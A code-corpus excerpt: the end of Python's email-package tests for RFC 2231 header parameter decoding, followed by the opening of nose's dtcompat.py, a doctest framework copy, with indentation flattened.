Return-Path: <bbb@zzz.org>
Delivered-To: bbb@zzz.org
Received: by mail.zzz.org (Postfix, from userid 889)
\tid 27CEAD38CC; Fri, 4 May 2001 14:05:44 -0400 (EDT)
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Message-ID: <15090.61304.110929.45684@aaa.zzz.org>
From: bbb@ddd.com (John X. Doe)
To: bbb@zzz.org
Subject: This is a test message
Date: Fri, 4 May 2001 14:05:44 -0400
Content-Type: text/plain; charset=us-ascii;
\ttitle*="us-ascii'en'This%20is%20even%20more%20%2A%2A%2Afun%2A%2A%2A%20isn%27t%20it%21"
Hi,
Do you like this message?
-Me
""")
def test_del_param(self):
eq = self.ndiffAssertEqual
msg = self._msgobj('msg_01.txt')
msg.set_param('foo', 'bar', charset='us-ascii', language='en')
msg.set_param('title', 'This is even more ***fun*** isn\'t it!',
charset='us-ascii', language='en')
msg.del_param('foo', header='Content-Type')
eq(msg.as_string(), """\
Return-Path: <bbb@zzz.org>
Delivered-To: bbb@zzz.org
Received: by mail.zzz.org (Postfix, from userid 889)
\tid 27CEAD38CC; Fri, 4 May 2001 14:05:44 -0400 (EDT)
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Message-ID: <15090.61304.110929.45684@aaa.zzz.org>
From: bbb@ddd.com (John X. Doe)
To: bbb@zzz.org
Subject: This is a test message
Date: Fri, 4 May 2001 14:05:44 -0400
Content-Type: text/plain; charset="us-ascii";
\ttitle*="us-ascii'en'This%20is%20even%20more%20%2A%2A%2Afun%2A%2A%2A%20isn%27t%20it%21"
Hi,
Do you like this message?
-Me
""")
def test_rfc2231_get_content_charset(self):
eq = self.assertEqual
msg = self._msgobj('msg_32.txt')
eq(msg.get_content_charset(), 'us-ascii')
def test_rfc2231_no_language_or_charset(self):
m = '''\
Content-Transfer-Encoding: 8bit
Content-Disposition: inline; filename="file____C__DOCUMENTS_20AND_20SETTINGS_FABIEN_LOCAL_20SETTINGS_TEMP_nsmail.htm"
Content-Type: text/html; NAME*0=file____C__DOCUMENTS_20AND_20SETTINGS_FABIEN_LOCAL_20SETTINGS_TEM; NAME*1=P_nsmail.htm
'''
msg = email.message_from_string(m)
param = msg.get_param('NAME')
self.failIf(isinstance(param, tuple))
self.assertEqual(
param,
'file____C__DOCUMENTS_20AND_20SETTINGS_FABIEN_LOCAL_20SETTINGS_TEMP_nsmail.htm')
def test_rfc2231_no_language_or_charset_in_filename(self):
m = '''\
Content-Disposition: inline;
\tfilename*0*="''This%20is%20even%20more%20";
\tfilename*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_filename(),
'This is even more ***fun*** is it not.pdf')
def test_rfc2231_no_language_or_charset_in_filename_encoded(self):
m = '''\
Content-Disposition: inline;
\tfilename*0*="''This%20is%20even%20more%20";
\tfilename*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_filename(),
'This is even more ***fun*** is it not.pdf')
def test_rfc2231_partly_encoded(self):
m = '''\
Content-Disposition: inline;
\tfilename*0="''This%20is%20even%20more%20";
\tfilename*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(
msg.get_filename(),
'This%20is%20even%20more%20***fun*** is it not.pdf')
def test_rfc2231_partly_nonencoded(self):
m = '''\
Content-Disposition: inline;
\tfilename*0="This%20is%20even%20more%20";
\tfilename*1="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(
msg.get_filename(),
'This%20is%20even%20more%20%2A%2A%2Afun%2A%2A%2A%20is it not.pdf')
def test_rfc2231_no_language_or_charset_in_boundary(self):
m = '''\
Content-Type: multipart/alternative;
\tboundary*0*="''This%20is%20even%20more%20";
\tboundary*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tboundary*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_boundary(),
'This is even more ***fun*** is it not.pdf')
def test_rfc2231_no_language_or_charset_in_charset(self):
# This is a nonsensical charset value, but tests the code anyway
m = '''\
Content-Type: text/plain;
\tcharset*0*="This%20is%20even%20more%20";
\tcharset*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tcharset*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_content_charset(),
'this is even more ***fun*** is it not.pdf')
def test_rfc2231_bad_encoding_in_filename(self):
m = '''\
Content-Disposition: inline;
\tfilename*0*="bogus'xx'This%20is%20even%20more%20";
\tfilename*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_filename(),
'This is even more ***fun*** is it not.pdf')
def test_rfc2231_bad_encoding_in_charset(self):
m = """\
Content-Type: text/plain; charset*=bogus''utf-8%E2%80%9D
"""
msg = email.message_from_string(m)
# This should return None because non-ascii characters in the charset
# are not allowed.
self.assertEqual(msg.get_content_charset(), None)
def test_rfc2231_bad_character_in_charset(self):
m = """\
Content-Type: text/plain; charset*=ascii''utf-8%E2%80%9D
"""
msg = email.message_from_string(m)
# This should return None because non-ascii characters in the charset
# are not allowed.
self.assertEqual(msg.get_content_charset(), None)
def test_rfc2231_bad_character_in_filename(self):
m = '''\
Content-Disposition: inline;
\tfilename*0*="ascii'xx'This%20is%20even%20more%20";
\tfilename*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2*="is it not.pdf%E2"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_filename(),
u'This is even more ***fun*** is it not.pdf\ufffd')
def test_rfc2231_unknown_encoding(self):
m = """\
Content-Transfer-Encoding: 8bit
Content-Disposition: inline; filename*=X-UNKNOWN''myfile.txt
"""
msg = email.message_from_string(m)
self.assertEqual(msg.get_filename(), 'myfile.txt')
def test_rfc2231_single_tick_in_filename_extended(self):
eq = self.assertEqual
m = """\
Content-Type: application/x-foo;
\tname*0*=\"Frank's\"; name*1*=\" Document\"
"""
msg = email.message_from_string(m)
charset, language, s = msg.get_param('name')
eq(charset, None)
eq(language, None)
eq(s, "Frank's Document")
def test_rfc2231_single_tick_in_filename(self):
m = """\
Content-Type: application/x-foo; name*0=\"Frank's\"; name*1=\" Document\"
"""
msg = email.message_from_string(m)
param = msg.get_param('name')
self.failIf(isinstance(param, tuple))
self.assertEqual(param, "Frank's Document")
def test_rfc2231_tick_attack_extended(self):
eq = self.assertEqual
m = """\
Content-Type: application/x-foo;
\tname*0*=\"us-ascii'en-us'Frank's\"; name*1*=\" Document\"
"""
msg = email.message_from_string(m)
charset, language, s = msg.get_param('name')
eq(charset, 'us-ascii')
eq(language, 'en-us')
eq(s, "Frank's Document")
def test_rfc2231_tick_attack(self):
m = """\
Content-Type: application/x-foo;
\tname*0=\"us-ascii'en-us'Frank's\"; name*1=\" Document\"
"""
msg = email.message_from_string(m)
param = msg.get_param('name')
self.failIf(isinstance(param, tuple))
self.assertEqual(param, "us-ascii'en-us'Frank's Document")
def test_rfc2231_no_extended_values(self):
eq = self.assertEqual
m = """\
Content-Type: application/x-foo; name=\"Frank's Document\"
"""
msg = email.message_from_string(m)
eq(msg.get_param('name'), "Frank's Document")
def test_rfc2231_encoded_then_unencoded_segments(self):
eq = self.assertEqual
m = """\
Content-Type: application/x-foo;
\tname*0*=\"us-ascii'en-us'My\";
\tname*1=\" Document\";
\tname*2*=\" For You\"
"""
msg = email.message_from_string(m)
charset, language, s = msg.get_param('name')
eq(charset, 'us-ascii')
eq(language, 'en-us')
eq(s, 'My Document For You')
def test_rfc2231_unencoded_then_encoded_segments(self):
eq = self.assertEqual
m = """\
Content-Type: application/x-foo;
\tname*0=\"us-ascii'en-us'My\";
\tname*1*=\" Document\";
\tname*2*=\" For You\"
"""
msg = email.message_from_string(m)
charset, language, s = msg.get_param('name')
eq(charset, 'us-ascii')
eq(language, 'en-us')
eq(s, 'My Document For You')
def _testclasses():
mod = sys.modules[__name__]
return [getattr(mod, name) for name in dir(mod) if name.startswith('Test')]
def suite():
suite = unittest.TestSuite()
for testclass in _testclasses():
suite.addTest(unittest.makeSuite(testclass))
return suite
def test_main():
for testclass in _testclasses():
run_unittest(testclass)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
apache-2.0
|
kisel/trex-core
|
scripts/external_libs/nose-1.3.4/python3/nose/ext/dtcompat.py
|
11
|
88107
|
# Module doctest.
# Released to the public domain 16-Jan-2001, by Tim Peters (tim@python.org).
# Major enhancements and refactoring by:
# Jim Fulton
# Edward Loper
# Provided as-is; use at your own risk; no warranty; no promises; enjoy!
#
# Modified for inclusion in nose to provide support for DocFileTest in
# python 2.3:
#
# - all doctests removed from module (they fail under 2.3 and 2.5)
# - now handles the $py.class extension when ran under Jython
r"""Module doctest -- a framework for running examples in docstrings.
In simplest use, end each module M to be tested with:
def _test():
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
Then running the module as a script will cause the examples in the
docstrings to get executed and verified:
python M.py
This won't display anything unless an example fails, in which case the
failing example(s) and the cause(s) of the failure(s) are printed to stdout
(why not stderr? because stderr is a lame hack <0.2 wink>), and the final
line of output is "Test failed.".
Run it with the -v switch instead:
python M.py -v
and a detailed report of all examples tried is printed to stdout, along
with assorted summaries at the end.
You can force verbose mode by passing "verbose=True" to testmod, or prohibit
it by passing "verbose=False". In either of those cases, sys.argv is not
examined by testmod.
There are a variety of other ways to run doctests, including integration
with the unittest framework, and support for running non-Python text
files containing doctests. There are also many ways to override parts
of doctest's default behaviors. See the Library Reference Manual for
details.
"""
__docformat__ = 'reStructuredText en'
__all__ = [
# 0, Option Flags
'register_optionflag',
'DONT_ACCEPT_TRUE_FOR_1',
'DONT_ACCEPT_BLANKLINE',
'NORMALIZE_WHITESPACE',
'ELLIPSIS',
'IGNORE_EXCEPTION_DETAIL',
'COMPARISON_FLAGS',
'REPORT_UDIFF',
'REPORT_CDIFF',
'REPORT_NDIFF',
'REPORT_ONLY_FIRST_FAILURE',
'REPORTING_FLAGS',
# 1. Utility Functions
'is_private',
# 2. Example & DocTest
'Example',
'DocTest',
# 3. Doctest Parser
'DocTestParser',
# 4. Doctest Finder
'DocTestFinder',
# 5. Doctest Runner
'DocTestRunner',
'OutputChecker',
'DocTestFailure',
'UnexpectedException',
'DebugRunner',
# 6. Test Functions
'testmod',
'testfile',
'run_docstring_examples',
# 7. Tester
'Tester',
# 8. Unittest Support
'DocTestSuite',
'DocFileSuite',
'set_unittest_reportflags',
# 9. Debugging Support
'script_from_examples',
'testsource',
'debug_src',
'debug',
]
import __future__
import sys, traceback, inspect, linecache, os, re
import unittest, difflib, pdb, tempfile
import warnings
from io import StringIO
# Don't whine about the deprecated is_private function in this
# module's tests.
warnings.filterwarnings("ignore", "is_private", DeprecationWarning,
__name__, 0)
# There are 4 basic classes:
# - Example: a <source, want> pair, plus an intra-docstring line number.
# - DocTest: a collection of examples, parsed from a docstring, plus
# info about where the docstring came from (name, filename, lineno).
# - DocTestFinder: extracts DocTests from a given object's docstring and
# its contained objects' docstrings.
# - DocTestRunner: runs DocTest cases, and accumulates statistics.
#
# So the basic picture is:
#
# list of:
# +------+ +---------+ +-------+
# |object| --DocTestFinder-> | DocTest | --DocTestRunner-> |results|
# +------+ +---------+ +-------+
# | Example |
# | ... |
# | Example |
# +---------+
# Option constants.
OPTIONFLAGS_BY_NAME = {}
def register_optionflag(name):
# Create a new flag unless `name` is already known.
return OPTIONFLAGS_BY_NAME.setdefault(name, 1 << len(OPTIONFLAGS_BY_NAME))
DONT_ACCEPT_TRUE_FOR_1 = register_optionflag('DONT_ACCEPT_TRUE_FOR_1')
DONT_ACCEPT_BLANKLINE = register_optionflag('DONT_ACCEPT_BLANKLINE')
NORMALIZE_WHITESPACE = register_optionflag('NORMALIZE_WHITESPACE')
ELLIPSIS = register_optionflag('ELLIPSIS')
IGNORE_EXCEPTION_DETAIL = register_optionflag('IGNORE_EXCEPTION_DETAIL')
COMPARISON_FLAGS = (DONT_ACCEPT_TRUE_FOR_1 |
DONT_ACCEPT_BLANKLINE |
NORMALIZE_WHITESPACE |
ELLIPSIS |
IGNORE_EXCEPTION_DETAIL)
REPORT_UDIFF = register_optionflag('REPORT_UDIFF')
REPORT_CDIFF = register_optionflag('REPORT_CDIFF')
REPORT_NDIFF = register_optionflag('REPORT_NDIFF')
REPORT_ONLY_FIRST_FAILURE = register_optionflag('REPORT_ONLY_FIRST_FAILURE')
REPORTING_FLAGS = (REPORT_UDIFF |
REPORT_CDIFF |
REPORT_NDIFF |
REPORT_ONLY_FIRST_FAILURE)
# Special string markers for use in `want` strings:
BLANKLINE_MARKER = '<BLANKLINE>'
ELLIPSIS_MARKER = '...'
######################################################################
## Table of Contents
######################################################################
# 1. Utility Functions
# 2. Example & DocTest -- store test cases
# 3. DocTest Parser -- extracts examples from strings
# 4. DocTest Finder -- extracts test cases from objects
# 5. DocTest Runner -- runs test cases
# 6. Test Functions -- convenient wrappers for testing
# 7. Tester Class -- for backwards compatibility
# 8. Unittest Support
# 9. Debugging Support
# 10. Example Usage
######################################################################
## 1. Utility Functions
######################################################################
def is_private(prefix, base):
"""prefix, base -> true iff name prefix + "." + base is "private".
Prefix may be an empty string, and base does not contain a period.
Prefix is ignored (although functions you write conforming to this
protocol may make use of it).
Return true iff base begins with an (at least one) underscore, but
does not both begin and end with (at least) two underscores.
"""
warnings.warn("is_private is deprecated; it wasn't useful; "
"examine DocTestFinder.find() lists instead",
DeprecationWarning, stacklevel=2)
return base[:1] == "_" and not base[:2] == "__" == base[-2:]
def _extract_future_flags(globs):
"""
Return the compiler-flags associated with the future features that
have been imported into the given namespace (globs).
"""
flags = 0
for fname in __future__.all_feature_names:
feature = globs.get(fname, None)
if feature is getattr(__future__, fname):
flags |= feature.compiler_flag
return flags
def _normalize_module(module, depth=2):
"""
Return the module specified by `module`. In particular:
- If `module` is a module, then return module.
- If `module` is a string, then import and return the
module with that name.
- If `module` is None, then return the calling module.
The calling module is assumed to be the module of
the stack frame at the given depth in the call stack.
"""
if inspect.ismodule(module):
return module
elif isinstance(module, str):
return __import__(module, globals(), locals(), ["*"])
elif module is None:
return sys.modules[sys._getframe(depth).f_globals['__name__']]
else:
raise TypeError("Expected a module, string, or None")
def _indent(s, indent=4):
"""
Add the given number of space characters to the beginning every
non-blank line in `s`, and return the result.
"""
# This regexp matches the start of non-blank lines:
return re.sub('(?m)^(?!$)', indent*' ', s)
def _exception_traceback(exc_info):
"""
Return a string containing a traceback message for the given
exc_info tuple (as returned by sys.exc_info()).
"""
# Get a traceback message.
excout = StringIO()
exc_type, exc_val, exc_tb = exc_info
traceback.print_exception(exc_type, exc_val, exc_tb, file=excout)
return excout.getvalue()
# Override some StringIO methods.
class _SpoofOut(StringIO):
def getvalue(self):
result = StringIO.getvalue(self)
# If anything at all was written, make sure there's a trailing
# newline. There's no way for the expected output to indicate
# that a trailing newline is missing.
if result and not result.endswith("\n"):
result += "\n"
# Prevent softspace from screwing up the next test case, in
# case they used print with a trailing comma in an example.
if hasattr(self, "softspace"):
del self.softspace
return result
def truncate(self, size=None):
StringIO.truncate(self, size)
if hasattr(self, "softspace"):
del self.softspace
# Worst-case linear-time ellipsis matching.
def _ellipsis_match(want, got):
if ELLIPSIS_MARKER not in want:
return want == got
# Find "the real" strings.
ws = want.split(ELLIPSIS_MARKER)
assert len(ws) >= 2
# Deal with exact matches possibly needed at one or both ends.
startpos, endpos = 0, len(got)
w = ws[0]
if w: # starts with exact match
if got.startswith(w):
startpos = len(w)
del ws[0]
else:
return False
w = ws[-1]
if w: # ends with exact match
if got.endswith(w):
endpos -= len(w)
del ws[-1]
else:
return False
if startpos > endpos:
# Exact end matches required more characters than we have, as in
# _ellipsis_match('aa...aa', 'aaa')
return False
# For the rest, we only need to find the leftmost non-overlapping
# match for each piece. If there's no overall match that way alone,
# there's no overall match period.
for w in ws:
# w may be '' at times, if there are consecutive ellipses, or
# due to an ellipsis at the start or end of `want`. That's OK.
# Search for an empty string succeeds, and doesn't change startpos.
startpos = got.find(w, startpos, endpos)
if startpos < 0:
return False
startpos += len(w)
return True
def _comment_line(line):
"Return a commented form of the given line"
line = line.rstrip()
if line:
return '# '+line
else:
return '#'
class _OutputRedirectingPdb(pdb.Pdb):
"""
A specialized version of the python debugger that redirects stdout
to a given stream when interacting with the user. Stdout is *not*
redirected when traced code is executed.
"""
def __init__(self, out):
self.__out = out
pdb.Pdb.__init__(self)
def trace_dispatch(self, *args):
# Redirect stdout to the given stream.
save_stdout = sys.stdout
sys.stdout = self.__out
# Call Pdb's trace dispatch method.
try:
return pdb.Pdb.trace_dispatch(self, *args)
finally:
sys.stdout = save_stdout
# [XX] Normalize with respect to os.path.pardir?
def _module_relative_path(module, path):
if not inspect.ismodule(module):
raise TypeError('Expected a module: %r' % module)
if path.startswith('/'):
raise ValueError('Module-relative files may not have absolute paths')
# Find the base directory for the path.
if hasattr(module, '__file__'):
# A normal module/package
basedir = os.path.split(module.__file__)[0]
elif module.__name__ == '__main__':
# An interactive session.
if len(sys.argv)>0 and sys.argv[0] != '':
basedir = os.path.split(sys.argv[0])[0]
else:
basedir = os.curdir
else:
# A module w/o __file__ (this includes builtins)
raise ValueError("Can't resolve paths relative to the module " +
module + " (it has no __file__)")
# Combine the base directory and the path.
return os.path.join(basedir, *(path.split('/')))
######################################################################
## 2. Example & DocTest
######################################################################
## - An "example" is a <source, want> pair, where "source" is a
## fragment of source code, and "want" is the expected output for
## "source." The Example class also includes information about
## where the example was extracted from.
##
## - A "doctest" is a collection of examples, typically extracted from
## a string (such as an object's docstring). The DocTest class also
## includes information about where the string was extracted from.
class Example:
"""
A single doctest example, consisting of source code and expected
output. `Example` defines the following attributes:
- source: A single Python statement, always ending with a newline.
The constructor adds a newline if needed.
- want: The expected output from running the source code (either
from stdout, or a traceback in case of exception). `want` ends
with a newline unless it's empty, in which case it's an empty
string. The constructor adds a newline if needed.
- exc_msg: The exception message generated by the example, if
the example is expected to generate an exception; or `None` if
it is not expected to generate an exception. This exception
message is compared against the return value of
`traceback.format_exception_only()`. `exc_msg` ends with a
newline unless it's `None`. The constructor adds a newline
if needed.
- lineno: The line number within the DocTest string containing
this Example where the Example begins. This line number is
zero-based, with respect to the beginning of the DocTest.
- indent: The example's indentation in the DocTest string.
I.e., the number of space characters that preceed the
example's first prompt.
- options: A dictionary mapping from option flags to True or
False, which is used to override default options for this
example. Any option flags not contained in this dictionary
are left at their default value (as specified by the
DocTestRunner's optionflags). By default, no options are set.
"""
def __init__(self, source, want, exc_msg=None, lineno=0, indent=0,
options=None):
# Normalize inputs.
if not source.endswith('\n'):
source += '\n'
if want and not want.endswith('\n'):
want += '\n'
if exc_msg is not None and not exc_msg.endswith('\n'):
exc_msg += '\n'
# Store properties.
self.source = source
self.want = want
self.lineno = lineno
self.indent = indent
if options is None: options = {}
self.options = options
self.exc_msg = exc_msg
class DocTest:
"""
A collection of doctest examples that should be run in a single
namespace. Each `DocTest` defines the following attributes:
- examples: the list of examples.
- globs: The namespace (aka globals) that the examples should
be run in.
- name: A name identifying the DocTest (typically, the name of
the object whose docstring this DocTest was extracted from).
- filename: The name of the file that this DocTest was extracted
from, or `None` if the filename is unknown.
- lineno: The line number within filename where this DocTest
begins, or `None` if the line number is unavailable. This
line number is zero-based, with respect to the beginning of
the file.
- docstring: The string that the examples were extracted from,
or `None` if the string is unavailable.
"""
def __init__(self, examples, globs, name, filename, lineno, docstring):
"""
Create a new DocTest containing the given examples. The
DocTest's globals are initialized with a copy of `globs`.
"""
assert not isinstance(examples, str), \
"DocTest no longer accepts str; use DocTestParser instead"
self.examples = examples
self.docstring = docstring
self.globs = globs.copy()
self.name = name
self.filename = filename
self.lineno = lineno
def __repr__(self):
if len(self.examples) == 0:
examples = 'no examples'
elif len(self.examples) == 1:
examples = '1 example'
else:
examples = '%d examples' % len(self.examples)
return ('<DocTest %s from %s:%s (%s)>' %
(self.name, self.filename, self.lineno, examples))
# This lets us sort tests by name:
def __cmp__(self, other):
if not isinstance(other, DocTest):
return -1
return cmp((self.name, self.filename, self.lineno, id(self)),
(other.name, other.filename, other.lineno, id(other)))
######################################################################
## 3. DocTestParser
######################################################################
class DocTestParser:
"""
A class used to parse strings containing doctest examples.
"""
# This regular expression is used to find doctest examples in a
# string. It defines three groups: `source` is the source code
# (including leading indentation and prompts); `indent` is the
# indentation of the first (PS1) line of the source code; and
# `want` is the expected output (including leading indentation).
_EXAMPLE_RE = re.compile(r'''
# Source consists of a PS1 line followed by zero or more PS2 lines.
(?P<source>
(?:^(?P<indent> [ ]*) >>> .*) # PS1 line
(?:\n [ ]* \.\.\. .*)*) # PS2 lines
\n?
# Want consists of any non-blank lines that do not start with PS1.
(?P<want> (?:(?![ ]*$) # Not a blank line
(?![ ]*>>>) # Not a line starting with PS1
.*$\n? # But any other line
)*)
''', re.MULTILINE | re.VERBOSE)
# A regular expression for handling `want` strings that contain
# expected exceptions. It divides `want` into three pieces:
# - the traceback header line (`hdr`)
# - the traceback stack (`stack`)
# - the exception message (`msg`), as generated by
# traceback.format_exception_only()
# `msg` may have multiple lines. We assume/require that the
# exception message is the first non-indented line starting with a word
# character following the traceback header line.
_EXCEPTION_RE = re.compile(r"""
# Grab the traceback header. Different versions of Python have
# said different things on the first traceback line.
^(?P<hdr> Traceback\ \(
(?: most\ recent\ call\ last
| innermost\ last
) \) :
)
\s* $ # toss trailing whitespace on the header.
(?P<stack> .*?) # don't blink: absorb stuff until...
^ (?P<msg> \w+ .*) # a line *starts* with alphanum.
""", re.VERBOSE | re.MULTILINE | re.DOTALL)
# A callable returning a true value iff its argument is a blank line
# or contains a single comment.
_IS_BLANK_OR_COMMENT = re.compile(r'^[ ]*(#.*)?$').match
def parse(self, string, name='<string>'):
"""
Divide the given string into examples and intervening text,
and return them as a list of alternating Examples and strings.
Line numbers for the Examples are 0-based. The optional
argument `name` is a name identifying this string, and is only
used for error messages.
"""
string = string.expandtabs()
# If all lines begin with the same indentation, then strip it.
min_indent = self._min_indent(string)
if min_indent > 0:
string = '\n'.join([l[min_indent:] for l in string.split('\n')])
output = []
charno, lineno = 0, 0
# Find all doctest examples in the string:
for m in self._EXAMPLE_RE.finditer(string):
# Add the pre-example text to `output`.
output.append(string[charno:m.start()])
# Update lineno (lines before this example)
lineno += string.count('\n', charno, m.start())
# Extract info from the regexp match.
(source, options, want, exc_msg) = \
self._parse_example(m, name, lineno)
# Create an Example, and add it to the list.
if not self._IS_BLANK_OR_COMMENT(source):
output.append( Example(source, want, exc_msg,
lineno=lineno,
indent=min_indent+len(m.group('indent')),
options=options) )
# Update lineno (lines inside this example)
lineno += string.count('\n', m.start(), m.end())
# Update charno.
charno = m.end()
# Add any remaining post-example text to `output`.
output.append(string[charno:])
return output
def get_doctest(self, string, globs, name, filename, lineno):
"""
Extract all doctest examples from the given string, and
collect them into a `DocTest` object.
`globs`, `name`, `filename`, and `lineno` are attributes for
the new `DocTest` object. See the documentation for `DocTest`
for more information.
"""
return DocTest(self.get_examples(string, name), globs,
name, filename, lineno, string)
def get_examples(self, string, name='<string>'):
"""
Extract all doctest examples from the given string, and return
them as a list of `Example` objects. Line numbers are
0-based, because it's most common in doctests that nothing
interesting appears on the same line as opening triple-quote,
and so the first interesting line is called \"line 1\" then.
The optional argument `name` is a name identifying this
string, and is only used for error messages.
"""
return [x for x in self.parse(string, name)
if isinstance(x, Example)]
def _parse_example(self, m, name, lineno):
"""
Given a regular expression match from `_EXAMPLE_RE` (`m`),
return a pair `(source, want)`, where `source` is the matched
example's source code (with prompts and indentation stripped);
and `want` is the example's expected output (with indentation
stripped).
`name` is the string's name, and `lineno` is the line number
where the example starts; both are used for error messages.
"""
# Get the example's indentation level.
indent = len(m.group('indent'))
# Divide source into lines; check that they're properly
# indented; and then strip their indentation & prompts.
source_lines = m.group('source').split('\n')
self._check_prompt_blank(source_lines, indent, name, lineno)
self._check_prefix(source_lines[1:], ' '*indent + '.', name, lineno)
source = '\n'.join([sl[indent+4:] for sl in source_lines])
# Divide want into lines; check that it's properly indented; and
# then strip the indentation. Spaces before the last newline should
# be preserved, so plain rstrip() isn't good enough.
want = m.group('want')
want_lines = want.split('\n')
if len(want_lines) > 1 and re.match(r' *$', want_lines[-1]):
del want_lines[-1] # forget final newline & spaces after it
self._check_prefix(want_lines, ' '*indent, name,
lineno + len(source_lines))
want = '\n'.join([wl[indent:] for wl in want_lines])
# If `want` contains a traceback message, then extract it.
m = self._EXCEPTION_RE.match(want)
if m:
exc_msg = m.group('msg')
else:
exc_msg = None
# Extract options from the source.
options = self._find_options(source, name, lineno)
return source, options, want, exc_msg
# This regular expression looks for option directives in the
# source code of an example. Option directives are comments
# starting with "doctest:". Warning: this may give false
# positives for string-literals that contain the string
# "#doctest:". Eliminating these false positives would require
# actually parsing the string; but we limit them by ignoring any
# line containing "#doctest:" that is *followed* by a quote mark.
_OPTION_DIRECTIVE_RE = re.compile(r'#\s*doctest:\s*([^\n\'"]*)$',
re.MULTILINE)
def _find_options(self, source, name, lineno):
"""
Return a dictionary containing option overrides extracted from
option directives in the given source string.
`name` is the string's name, and `lineno` is the line number
where the example starts; both are used for error messages.
"""
options = {}
# (note: with the current regexp, this will match at most once:)
for m in self._OPTION_DIRECTIVE_RE.finditer(source):
option_strings = m.group(1).replace(',', ' ').split()
for option in option_strings:
if (option[0] not in '+-' or
option[1:] not in OPTIONFLAGS_BY_NAME):
raise ValueError('line %r of the doctest for %s '
'has an invalid option: %r' %
(lineno+1, name, option))
flag = OPTIONFLAGS_BY_NAME[option[1:]]
options[flag] = (option[0] == '+')
if options and self._IS_BLANK_OR_COMMENT(source):
raise ValueError('line %r of the doctest for %s has an option '
'directive on a line with no example: %r' %
(lineno, name, source))
return options
# This regular expression finds the indentation of every non-blank
# line in a string.
_INDENT_RE = re.compile('^([ ]*)(?=\S)', re.MULTILINE)
def _min_indent(self, s):
"Return the minimum indentation of any non-blank line in `s`"
indents = [len(indent) for indent in self._INDENT_RE.findall(s)]
if len(indents) > 0:
return min(indents)
else:
return 0
def _check_prompt_blank(self, lines, indent, name, lineno):
"""
Given the lines of a source string (including prompts and
leading indentation), check to make sure that every prompt is
followed by a space character. If any line is not followed by
a space character, then raise ValueError.
"""
for i, line in enumerate(lines):
if len(line) >= indent+4 and line[indent+3] != ' ':
raise ValueError('line %r of the docstring for %s '
'lacks blank after %s: %r' %
(lineno+i+1, name,
line[indent:indent+3], line))
def _check_prefix(self, lines, prefix, name, lineno):
"""
Check that every line in the given list starts with the given
prefix; if any line does not, then raise a ValueError.
"""
for i, line in enumerate(lines):
if line and not line.startswith(prefix):
raise ValueError('line %r of the docstring for %s has '
'inconsistent leading whitespace: %r' %
(lineno+i+1, name, line))
######################################################################
## 4. DocTest Finder
######################################################################
class DocTestFinder:
"""
A class used to extract the DocTests that are relevant to a given
object, from its docstring and the docstrings of its contained
objects. Doctests can currently be extracted from the following
object types: modules, functions, classes, methods, staticmethods,
classmethods, and properties.
"""
def __init__(self, verbose=False, parser=DocTestParser(),
recurse=True, _namefilter=None, exclude_empty=True):
"""
Create a new doctest finder.
The optional argument `parser` specifies a class or
function that should be used to create new DocTest objects (or
objects that implement the same interface as DocTest). The
signature for this factory function should match the signature
of the DocTest constructor.
If the optional argument `recurse` is false, then `find` will
only examine the given object, and not any contained objects.
If the optional argument `exclude_empty` is false, then `find`
will include tests for objects with empty docstrings.
"""
self._parser = parser
self._verbose = verbose
self._recurse = recurse
self._exclude_empty = exclude_empty
# _namefilter is undocumented, and exists only for temporary backward-
# compatibility support of testmod's deprecated isprivate mess.
self._namefilter = _namefilter
def find(self, obj, name=None, module=None, globs=None,
extraglobs=None):
"""
Return a list of the DocTests that are defined by the given
object's docstring, or by any of its contained objects'
docstrings.
The optional parameter `module` is the module that contains
the given object. If the module is not specified or is None, then
the test finder will attempt to automatically determine the
correct module. The object's module is used:
- As a default namespace, if `globs` is not specified.
- To prevent the DocTestFinder from extracting DocTests
from objects that are imported from other modules.
- To find the name of the file containing the object.
- To help find the line number of the object within its
file.
Contained objects whose module does not match `module` are ignored.
If `module` is False, no attempt to find the module will be made.
This is obscure, of use mostly in tests: if `module` is False, or
is None but cannot be found automatically, then all objects are
considered to belong to the (non-existent) module, so all contained
objects will (recursively) be searched for doctests.
The globals for each DocTest is formed by combining `globs`
and `extraglobs` (bindings in `extraglobs` override bindings
in `globs`). A new copy of the globals dictionary is created
for each DocTest. If `globs` is not specified, then it
defaults to the module's `__dict__`, if specified, or {}
otherwise. If `extraglobs` is not specified, then it defaults
to {}.
"""
# If name was not specified, then extract it from the object.
if name is None:
name = getattr(obj, '__name__', None)
if name is None:
raise ValueError("DocTestFinder.find: name must be given "
"when obj.__name__ doesn't exist: %r" %
(type(obj),))
# Find the module that contains the given object (if obj is
# a module, then module=obj.). Note: this may fail, in which
# case module will be None.
if module is False:
module = None
elif module is None:
module = inspect.getmodule(obj)
# Read the module's source code. This is used by
# DocTestFinder._find_lineno to find the line number for a
# given object's docstring.
try:
file = inspect.getsourcefile(obj) or inspect.getfile(obj)
source_lines = linecache.getlines(file)
if not source_lines:
source_lines = None
except TypeError:
source_lines = None
# Initialize globals, and merge in extraglobs.
if globs is None:
if module is None:
globs = {}
else:
globs = module.__dict__.copy()
else:
globs = globs.copy()
if extraglobs is not None:
globs.update(extraglobs)
# Recursively expore `obj`, extracting DocTests.
tests = []
self._find(tests, obj, name, module, source_lines, globs, {})
# Sort the tests by alpha order of names, for consistency in
# verbose-mode output. This was a feature of doctest in Pythons
